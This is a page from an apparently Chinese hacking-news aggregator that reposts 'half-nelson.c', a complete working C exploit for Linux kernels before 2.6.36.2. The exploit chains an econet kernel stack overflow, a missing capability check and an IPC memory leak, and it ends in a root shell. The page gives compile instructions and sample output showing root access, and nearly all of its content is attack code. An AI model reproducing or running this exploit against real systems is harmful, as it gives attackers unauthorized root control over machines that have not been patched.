记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

Linux Kernel < 2.6.36.2 Econet Privilege Escalation Explo

2013-05-11 15:45

/*
 * half-nelson.c
 *
 * Linux Kernel < 2.6.36.2 Econet Privilege Escalation Exploit
 * Jon Oberheide <jon@oberheide.org>
 * http://jon.oberheide.org
 *
 * Information:
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848
 *
 *   Stack-based buffer overflow in the econet_sendmsg function in
 *   net/econet/af_econet.c in the Linux kernel before 2.6.36.2, when an
 *   econet address is configured, allows local users to gain privileges by
 *   providing a large number of iovec structures.
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3850
 *
 *   The ec_dev_ioctl function in net/econet/af_econet.c in the Linux kernel
 *   before 2.6.36.2 does not require the CAP_NET_ADMIN capability, which
 *   allows local users to bypass intended access restrictions and configure
 *   econet addresses via an SIOCSIFADDR ioctl call.
 *
 *   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4073
 *
 *   The ipc subsystem in the Linux kernel before 2.6.37-rc1 does not
 *   initialize certain structures, which allows local users to obtain
 *   potentially sensitive information from kernel stack memory.
 *
 * Usage:
 *
 *   $ gcc half-nelson.c -o half-nelson -lrt
 *   $ ./half-nelson
 *   [+] looking for symbols...
 *   [+] resolved symbol commit_creds to 0xffffffff81088ad0
 *   [+] resolved symbol prepare_kernel_cred to 0xffffffff81088eb0
 *   [+] resolved symbol ia32_sysret to 0xffffffff81046692
 *   [+] spawning children to achieve adjacent kstacks...
 *   [+] found parent kstack at 0xffff88001c6ca000
 *   [+] found adjacent children kstacks at 0xffff88000d10a000 and 0xffff88000d10c000
 *   [+] lower child spawning a helper...
 *   [+] lower child calling compat_sys_wait4 on helper...
 *   [+] helper going to sleep...
 *   [+] upper child triggering stack overflow...
 *   [+] helper woke up
 *   [+] lower child returned from compat_sys_wait4
 *   [+] parent's restart_block has been clobbered
 *   [+] escalating privileges...
 *   [+] launching root shell!
 *   # id
 *   uid=0(root) gid=0(root)
 *
 * Notes:
 *
 *   This exploit leverages three vulnerabilities to escalate privileges.
 *   The primary vulnerability is a kernel stack overflow, not a stack buffer
 *   overflow as the CVE description incorrectly states. I believe this is the
 *   first public exploit for a kernel stack overflow, and it turns out to be
 *   a bit tricky due to some particulars of the econet vulnerability. A full
 *   breakdown of the exploit is forthcoming.
 *
 *   Tested on Ubuntu 10.04 LTS (2.6.32-21-generic).
 *
 *   Greets to pipacs, kees, redpig, taviso, bliss, nelhage, spender, twiz, and rocky.
 */

#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <syscall.h>
#include <inttypes.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/mman.h>
#include <sys/ipc.h>
#include <sys/sem.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <sys/syscall.h>
#include <netinet/in.h>
#include <net/if.h>

#define IOVS           446
#define NPROC          1024
#define KSTACK_SIZE    8192

#define KSTACK_UNINIT  0
#define KSTACK_UPPER   1
#define KSTACK_LOWER   2
#define KSTACK_DIE     3
#define KSTACK_PARENT  4
#define KSTACK_CLOBBER 5

#define LEAK_BASE      0xffff880000000000
#define LEAK_TOP       0xffff8800c0000000
#define LEAK_DEPTH     500
#define LEAK_OFFSET    32

#define NR_IPC         0x75
#define NR_WAIT4       0x72
#define SEMCTL         0x3

#ifndef PF_ECONET
#define PF_ECONET      19
#endif

#define STACK_OFFSET   6
#define RESTART_OFFSET 40

struct ec_addr {
 unsigned char station;
 unsigned char net;
};

struct sockaddr_ec {
 unsigned short sec_family;
 unsigned char port;
 unsigned char cb;
 unsigned char type;
 struct ec_addr addr;
 unsigned long cookie;
};

struct ipc64_perm {
 uint32_t key;
 uint32_t uid;
 uint32_t gid;
 uint32_t cuid;
 uint32_t cgid;
 uint32_t mode;
 uint16_t seq;
 uint16_t __pad2;
 unsigned long __unused1;
 unsigned long __unused2;
};

struct semid64_ds {
 struct ipc64_perm sem_perm;
 unsigned long sem_otime;
 unsigned long __unused1;
 unsigned long sem_ctime;
 unsigned long __unused;
 unsigned long sem_nsems;
 unsigned long __unused3;
 unsigned long __unused4;
};

union semun {
 int val;
 struct semid_ds *buf;
 unsigned short *array;
 struct seminfo *__buf;
};

struct region {
 unsigned long parent;
 unsigned long addrs[NPROC];
};
struct region *region;

typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);
_commit_creds commit_creds;
_prepare_kernel_cred prepare_kernel_cred;
unsigned long ia32_sysret;
 
void __attribute__((regparm(3)))
kernel_code(void)
{
 commit_creds(prepare_kernel_cred(0));
}

void
payload_parent(void)
{
 asm volatile (
  "mov $kernel_code, %rax\n"
  "call *%rax\n"
 );
}

void
payload_child(void)
{
 asm volatile (
  "movq $payload_parent, (%0)\n"
  "jmpq *%1\n"
  :
  : "r"(region->parent + RESTART_OFFSET), "r"(ia32_sysret)
 );
}

unsigned long
get_kstack(void)
{
 int i, size, offset;
 union semun *arg;
 struct semid_ds dummy;
 struct semid64_ds *leaked;
 char *stack_start, *stack_end;
 unsigned char *p;
 unsigned long kstack, *ptr;

 /* make sure our argument is 32-bit accessible */
 arg = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);
 if (arg == MAP_FAILED) {
  printf("[-] failure mapping memory, aborting!\n");
  exit(1);
 }

 /* map a fake stack to use during syscall */
 stack_start = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_ANONYMOUS | MAP_PRIVATE | MAP_32BIT, -1, 0);
 if (stack_start == MAP_FAILED) {
  printf("[-] failure mapping memory, aborting!\n");
  exit(1);
 }
 stack_end = stack_start + 4096;

 memset(arg, 0, sizeof(union semun));
 memset(&dummy, 0, sizeof(struct semid_ds));
 arg->buf = &dummy;

 /* syscall(NR_IPC, SEMCTL, 0, 0, IPC_SET, arg) */
 asm volatile (
  "push %%rax\n"
  "push %%rbx\n"
  "push %%rcx\n"
  "push %%rdx\n"
  "push %%rsi\n"
  "push %%rdi\n"
  "movl %0, %%eax\n"
  "movl %1, %%ebx\n"
  "movl %2, %%ecx\n"
  "movl %3, %%edx\n"
  "movl %4, %%esi\n"
  "movq %5, %%rdi\n"
  "movq %%rsp, %%r8\n"
  "movq %6, %%rsp\n"
  "push %%r8\n"
  "int $0x80\n"
  "pop %%r8\n"
  "movq %%r8, %%rsp\n"
  "pop %%rdi\n"
  "pop %%rsi\n"
  "pop %%rdx\n"
  "pop %%rcx\n"
  "pop %%rbx\n"
  "pop %%rax\n"
  :
  : "r"(NR_IPC), "r"(SEMCTL), "r"(0), "r"(0), "r"(IPC_SET), "r"(arg), "r"(stack_end)
  : "memory", "rax", "rbx", "rcx", "rdx", "rsi", "rdi", "r8"
 );

 /* naively extract a pointer to the kstack from the kstack */
 p = stack_end - (sizeof(unsigned long) + sizeof(struct semid64_ds)) + LEAK_OFFSET;
 kstack = *(unsigned long *) p;

 if (kstack < LEAK_BASE || kstack > LEAK_TOP) {
  printf("[-] failed to leak a suitable kstack address, try again!\n");
  exit(1);
 }
 if ((kstack % 0x1000) < (0x1000 - LEAK_DEPTH)) {
  printf("[-] failed to leak a suitable kstack address, try again!\n");
  exit(1);
 }

 kstack = kstack & ~0x1fff;
 
 return kstack;
}

unsigned long
get_symbol(char *name)
{
 FILE *f;
 unsigned long addr;
 char dummy, sym[512];
 int ret = 0;
 
 f = fopen("/proc/kallsyms", "r");
 if (!f) {
  return 0;
 }
 
 while (ret != EOF) {
  ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym);
  if (ret == 0) {
   fscanf(f, "%s\n", sym);
   continue;
  }
  if (!strcmp(name, sym)) {
   printf("[+] resolved symbol %s to %p\n", name, (void *) addr);
   fclose(f);
   return addr;
  }
 }
 fclose(f);
 
 return 0;
}

int
get_adjacent_kstacks(void)
{
 int i, ret, shm, pid, type;

 /* create shared communication channel between parent and its children */
 shm = shm_open("/halfnelson", O_RDWR | O_CREAT, S_IRWXU | S_IRWXG | S_IRWXO);
 if (shm < 0) {
  printf("[-] failed creating shared memory, aborting!\n");
  exit(1);
 }

 ret = ftruncate(shm, sizeof(struct region));
 if (ret != 0) {
  printf("[-] failed resizing shared memory, aborting!\n");
  exit(1);
 }

 region = mmap(NULL, sizeof(struct region), PROT_READ | PROT_WRITE, MAP_SHARED, shm, 0);
 memset(region, KSTACK_UNINIT, sizeof(struct region));

 /* parent kstack self-discovery */
 region->parent = get_kstack();

 printf("[+] found parent kstack at 0x%lx\n", region->parent);

 /* fork and discover children with adjacently-allocated kernel stacks */
 for (i = 0; i < NPROC; ++i) {
  pid = fork();

  if (pid > 0) {
   type = KSTACK_PARENT;
   continue;
  } else if (pid == 0) {
   /* children do kstack self-discovery */
   region->addrs[i] = get_kstack();

   /* children sleep until parent has found adjacent children */
   while (1) {
    sleep(1);
    if (region->addrs[i] == KSTACK_DIE) {
     /* parent doesn't need us :-( */
     exit(0);
    } else if (region->addrs[i] == KSTACK_UPPER) {
     /* we're the upper adjacent process */
     type = KSTACK_UPPER;
     break;
    } else if (region->addrs[i] == KSTACK_LOWER) {
     /* we're the lower adjacent process */
     type = KSTACK_LOWER;
     break;
    }
   }
   break;
  } else {
   printf("[-] fork failed, aborting!\n");
   exit(1);
  }
 }

 return type;
}

void
do_parent(void)
{
 int i, j, upper, lower;

 /* parent sleeps until we've discovered all the child kstacks */
 while (1) {
  sleep(1);
  for (i = 0; i < NPROC; ++i) {
   if (region->addrs[i] == KSTACK_UNINIT) {
    break;
   }
  }
  if (i == NPROC) {
   break;
  }
 }

 /* figure out if we have any adjacent child kstacks */
 for (i = 0; i < NPROC; ++i) {
  for (j = 0; j < NPROC; ++j) {
   if (region->addrs[i] == region->addrs[j] + KSTACK_SIZE) {
    break;
   }
  }
  if (j != NPROC) {
   break;
  }
 }
 if (i == NPROC && j == NPROC) {
  printf("[-] failed to find adjacent kstacks, try again!\n");
  exit(1);
 }

 upper = i;
 lower = j;

 printf("[+] found adjacent children kstacks at 0x%lx and 0x%lx\n", region->addrs[lower], region->addrs[upper]);

 /* signal to non-adjacent children to die */
 for (i = 0; i < NPROC; ++i) {
  if (i != upper && i != lower) {
   region->addrs[i] = KSTACK_DIE;
  }
 }

 /* signal adjacent children to continue on */
 region->addrs[upper] = KSTACK_UPPER;
 region->addrs[lower] = KSTACK_LOWER;

 /* parent sleeps until child has clobbered the fptr */
 while (1) {
  sleep(1);
  if (region->parent == KSTACK_CLOBBER) {
   break;
  }
 }

 printf("[+] escalating privileges...\n");

 /* trigger our clobbered fptr */
 syscall(__NR_restart_syscall);

 /* our privileges should be escalated now */
 if (getuid() != 0) {
  printf("[-] privilege escalation failed, aborting!\n");
  exit(1);
 }

 printf("[+] launching root shell!\n");

 execl("/bin/sh", "/bin/sh", NULL);
}

void
do_child_upper(void)
{
 int i, ret, eco_sock;
 struct sockaddr_ec eco_addr;
 struct msghdr eco_msg;
 struct iovec iovs[IOVS];
 struct ifreq ifr;
 char *target;

 /* calculate payload target, skip prologue */
 target = (char *) payload_child;
 target += 4;
 
 /* give lower child a chance to enter its wait4 call */
 sleep(1);

 /* write some zeros */
 for (i = 0; i < STACK_OFFSET; ++i) {
  iovs[i].iov_base = (void *) 0x0;
  iovs[i].iov_len = 0;
 }

 /* overwrite saved ia32_sysret address on stack */
 iovs[STACK_OFFSET].iov_base = (void *) target;
 iovs[STACK_OFFSET].iov_len = 0x0246;

 /* force abort via EFAULT */
 for (i = STACK_OFFSET + 1; i < IOVS; ++i) {
  iovs[i].iov_base = (void *) 0xffffffff00000000;
  iovs[i].iov_len = 0;
 }

 /* create econet socket */
 eco_sock = socket(PF_ECONET, SOCK_DGRAM, 0);
 if (eco_sock < 0) {
  printf("[-] failed creating econet socket, aborting!\n");
  exit(1);
 }

 memset(&ifr, 0, sizeof(ifr));
 strcpy(ifr.ifr_name, "lo");

 /* trick econet into associated with the loopback */
 ret = ioctl(eco_sock, SIOCSIFADDR, &ifr);
 if (ret != 0) {
  printf("[-] failed setting interface address, aborting!\n");
  exit(1);
 }

 memset(&eco_addr, 0, sizeof(eco_addr));
 memset(&eco_msg, 0, sizeof(eco_msg));
 eco_msg.msg_name = &eco_addr;
 eco_msg.msg_namelen = sizeof(eco_addr);
 eco_msg.msg_flags = 0;
 eco_msg.msg_iov = &iovs[0];
 eco_msg.msg_iovlen = IOVS;

 printf("[+] upper child triggering stack overflow...\n");

 /* trigger the kstack overflow into lower child's kstack */
 ret = sendmsg(eco_sock, &eco_msg, 0);
 if (ret != -1 || errno != EFAULT) {
  printf("[-] sendmsg succeeded unexpectedly, aborting!\n");
  exit(1);
 }

 close(eco_sock);
}

void
do_child_lower(void)
{
 int pid;

 printf("[+] lower child spawning a helper...\n");

 /* fork off a helper to wait4 on */
 pid = fork();
 if (pid == 0) {
  printf("[+] helper going to sleep...\n");
  sleep(5);
  printf("[+] helper woke up\n");
  exit(1);
 }

 printf("[+] lower child calling compat_sys_wait4 on helper...\n");

 /* syscall(NR_WAIT4, pid, 0, 0, 0) */
 asm volatile (
  "push %%rax\n"
  "push %%rbx\n"
  "push %%rcx\n"
  "push %%rdx\n"
  "push %%rsi\n"
  "movl %0, %%eax\n"
  "movl %1, %%ebx\n"
  "movl %2, %%ecx\n"
  "movl %3, %%edx\n"
  "movl %4, %%esi\n"
  "int $0x80\n"
  "pop %%rsi\n"
  "pop %%rdx\n"
  "pop %%rcx\n"
  "pop %%rbx\n"
  "pop %%rax\n"
  :
  : "r"(NR_WAIT4), "r"(pid), "r"(0), "r"(0), "r"(0)
  : "memory", "rax", "rbx", "rcx", "rdx", "rsi"
 );

 printf("[+] lower child returned from compat_sys_wait4\n");

 printf("[+] parent's restart_block has been clobbered\n");

 /* signal parent that our fptr should now be clobbered */
 region->parent = KSTACK_CLOBBER;
}

int
main(int argc, char **argv)
{
 int type;

 if (sizeof(unsigned long) != 8) {
  printf("[-] x86_64 only, sorry!\n");
  exit(1);
 }

 printf("[+] looking for symbols...\n");
 
 commit_creds = (_commit_creds) get_symbol("commit_creds");
 if (!commit_creds) {
  printf("[-] symbol table not available, aborting!\n");
  exit(1);
 }
 
 prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred");
 if (!prepare_kernel_cred) {
  printf("[-] symbol table not available, aborting!\n");
  exit(1);
 }

 ia32_sysret = get_symbol("ia32_sysret");
 if (!ia32_sysret) {
  printf("[-] symbol table not available, aborting!\n");
  exit(1);
 }

 printf("[+] spawning children to achieve adjacent kstacks...\n");

 type = get_adjacent_kstacks();

 if (type == KSTACK_PARENT) {
  do_parent();
 } else if (type == KSTACK_UPPER) {
  do_child_upper();
 } else if (type == KSTACK_LOWER) {
  do_child_lower();
 }

 return 0;
}

half-nelson.c Exploit http://www.8090sec.com/Exploit/half-nelson.c



知识来源: www.8090sec.com/Linuxgongfang/111427.html

阅读:85286 | 评论:0 | 标签:exp

想收藏或者和大家分享这篇好文章→复制链接地址

“Linux Kernel < 2.6.36.2 Econet Privilege Escalation Explo”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云